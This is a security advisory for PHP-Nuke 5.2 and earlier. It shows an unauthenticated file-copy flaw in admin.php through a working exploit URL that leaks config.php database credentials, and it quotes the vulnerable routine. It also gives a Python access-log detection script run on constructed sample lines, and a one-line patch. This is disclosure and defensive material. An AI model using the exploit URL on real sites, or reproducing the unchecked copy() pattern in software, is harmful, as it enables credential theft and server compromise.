Security Vulnerability in PHP-Nuke Allows File Copying (admin.php)

Vulnerable systems:
PHP-Nuke 5.2 and prior

Immune systems:
PHP-Nuke 5.0 RC1 (only this one)

Exploit:
First run the following URL:
http://www.example.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
(NOTE: URL wrapped for readability)

Then access the created file:
http://www.example.net/images/hacked.txt

You will then see the contents of config.php, which contains the DB passwords. Any other file can be copied just as easily.

Vulnerable code:
The admin.php contains this routine:

$basedir = dirname($SCRIPT_FILENAME);
$textrows = 20;
$textcols = 85;
$udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/";
if($cancel) $op="FileManager";
if($upload) {
    copy($userfile,$basedir.$wdir.$userfile_name);
    $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
    // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
    //include("header.php");
    //GraphicAdmin($hlpfile);
    //html_header();
    //displaydir();
    $wdir2="/";
    chdir($basedir . $wdir2);
    //CloseTable();
    //include("footer.php");
    Header("Location: admin.php?op=FileManager");
    exit;
}

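This routine does not check whether you are logged in as admin, so it can be used without any authentication. $upload, $userfile, $userfile_name and $wdir all come straight from the request, as the URL above shows, so the caller chooses both the file that copy() reads and the location the copy is written to.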
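
To check whether a site received a request of this shape, the web server's access log can be searched for admin.php requests whose query string sets upload together with userfile or userfile_name. The script below is an added example, not part of the original advisory or of PHP-Nuke; the log lines are constructed samples in combined log format, and it assumes a genuine file-manager upload is a form POST, so these names never appear in a query string.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2001:13:55:36 +0000] "GET /admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt HTTP/1.0" 302 0
192.0.2.10 - - [10/Oct/2001:13:56:01 +0000] "GET /admin.php?op=FileManager HTTP/1.0" 200 5120
192.0.2.10 - - [10/Oct/2001:13:57:12 +0000] "POST /admin.php HTTP/1.0" 302 0
203.0.113.4 - - [10/Oct/2001:14:02:45 +0000] "GET /modules.php?name=News&upload=1 HTTP/1.0" 200 900
198.51.100.7 - - [10/Oct/2001:14:03:00 +0000] "GET /nuke/admin.php?upload=1&userfile=config.php&userfile_name=copy.txt&wdir=%2Fimages%2F HTTP/1.0" 302 0
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})\b')

# Variables the vulnerable routine passes to copy(); set by the caller via the URL.
COPY_PARAMS = {"userfile", "userfile_name"}


def find_copy_requests(log_text):
    """Return one record per admin.php request that drives the copy() routine."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.lower().endswith("/admin.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes
        # if($upload) is true in PHP unless the value is empty or "0";
        # PHP keeps the last value when a parameter is repeated.
        if params.get("upload", [""])[-1] in ("", "0"):
            continue
        if not (params.keys() & COPY_PARAMS):
            continue
        hits.append({
            "ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "source": params.get("userfile", [""])[-1],
            # The routine defaults $wdir to "/" when it is not supplied.
            "dest": params.get("wdir", ["/"])[-1] + params.get("userfile_name", [""])[-1],
        })
    return hits


if __name__ == "__main__":
    for hit in find_copy_requests(SAMPLE_LOG):
        print(hit)
```

Each hit names the file that was read and the web-reachable path it was copied to, which is the list of files to treat as disclosed and of copies to remove. The check only sees what the access log records, which is the request line.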

Solution:
A temporary solution would be to change:
"if($upload) {"

To

"if (($upload) && ($admintest)) {"
